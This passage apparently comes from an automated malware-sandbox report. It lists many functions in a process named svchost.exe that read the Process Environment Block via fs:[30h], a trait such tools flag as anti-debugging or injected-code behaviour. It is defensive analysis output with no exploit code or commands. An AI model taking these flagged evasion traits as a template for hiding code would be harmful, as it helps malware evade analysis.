            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
